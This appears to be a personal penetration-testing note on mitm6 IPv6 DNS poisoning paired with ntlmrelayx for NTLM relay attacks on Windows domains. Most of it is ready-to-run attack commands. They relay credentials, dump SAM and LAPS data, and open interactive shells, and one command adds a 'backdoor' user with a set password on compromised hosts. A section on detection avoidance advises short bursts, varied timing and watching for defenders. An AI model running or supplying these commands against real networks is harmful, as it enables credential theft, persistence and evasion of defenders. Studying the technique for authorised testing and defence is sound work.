mitm6-poisoning

Technique Info

Overview

mitm6 exploits the default Windows configuration where IPv6 is enabled but not properly configured. It sets up a rogue DHCPv6 server to redirect DNS queries through the attacker machine, enabling credential harvesting and relay attacks.

Prerequisites

Target network has Windows hosts with IPv6 enabled (default)
Network allows DHCPv6 traffic
Attacker machine on same network segment
Compiled list of relay targets (SMB signing disabled hosts)

How mitm6 Works

Advertises as DHCPv6 server via router advertisements
Windows clients request IPv6 configuration automatically
Provides malicious DNS server (attacker’s IP)
Redirects authentication requests to attacker-controlled services
Captures NTLM authentication for relay/cracking

Step 1: Basic mitm6 Setup

Install mitm6:

pip3 install mitm6
# OR
git clone https://github.com/dirkjanm/mitm6.git
cd mitm6
pip3 install .

Basic mitm6 execution:

# Target specific domain
mitm6 -d domain.local
 
# Target domain with custom interface
mitm6 -d domain.local -i eth0
 
# Verbose output
mitm6 -d domain.local -v

Step 2: Combine with ntlmrelayx

Setup ntlmrelayx in separate terminal:

# Basic relay setup
ntlmrelayx.py -tf targets.txt -6
 
# Relay with command execution
ntlmrelayx.py -tf targets.txt -6 -c "whoami"
 
# Interactive shells
ntlmrelayx.py -tf targets.txt -6 -i

Advanced relay options:

# Dump SAM database
ntlmrelayx.py -tf targets.txt -6 --sam
 
# LDAP relay for domain enumeration
ntlmrelayx.py -tf targets.txt -6 --dump-adcs --dump-laps

Step 3: Execution Strategy

Run mitm6 in short bursts (recommended):

# Run for 5 minutes every hour
timeout 300 mitm6 -d domain.local

Monitor for authentication attempts:

# Watch both terminals for successful relays
# mitm6 will show DNS redirections
# ntlmrelayx will show successful authentications

Step 4: Advanced Options

Target specific services:

# Focus on specific hostnames
mitm6 -d domain.local --host-allowlist dc01.domain.local,exchange.domain.local
 
# Block specific hosts  
mitm6 -d domain.local --host-denylist monitoring.domain.local

Custom DNS responses:

# Redirect specific queries
mitm6 -d domain.local --localdomain attacker.local

Step 5: Monitoring and Results

Watch for successful authentications:
- Computer account authentications (high value)
- User account authentications
- Service account authentications
Document captured credentials:
- NTLMv2 hashes for offline cracking
- Successful relay attempts
- Compromised systems and access level

Timing Considerations

Recommended Schedule:

5 minutes every hour during business hours
10 minutes during lunch/break times
Avoid running continuously (creates network noise)
Monitor for defensive responses

Detection Avoidance

Limit runtime to avoid pattern detection
Vary timing between executions
Monitor network for defensive tools
Stop if unusual network behavior observed

Troubleshooting

No responses: Check IPv6 is enabled on targets
Permission errors: Run with sudo for raw socket access
Interface issues: Specify correct interface with -i
Domain issues: Verify correct domain name

Cleanup

Stop mitm6 process (Ctrl+C)
IPv6 configuration resets automatically on Windows clients
Document all captured credentials
Remove any created user accounts on compromised systems

Common Command Combinations

# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -tf smb-signing-disabled.txt -6 -c "net user backdoor P@ssw0rd123 /add"
 
# Terminal 2: Run mitm6 for 5 minutes  
timeout 300 mitm6 -d company.local -v
 
# Terminal 3: Monitor results
tail -f /tmp/mitm6.log

Notes

High success rate in Windows environments
Relatively stealthy compared to ARP poisoning
Works across VLANs in some configurations
Effective against modern Windows (7/8/10/11, Server 2008+)
Combines well with other poisoning techniques (Responder, etc.)

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "active-directory") OR contains(tags, "poisoning") OR contains(tags, "gaining-access")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

active-directory

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "active-directory")
SORT file.ctime DESC

poisoning

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "poisoning")
SORT file.ctime DESC

gaining-access

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "gaining-access")
SORT file.ctime DESC

📓 Jorkle's Notes

Explorer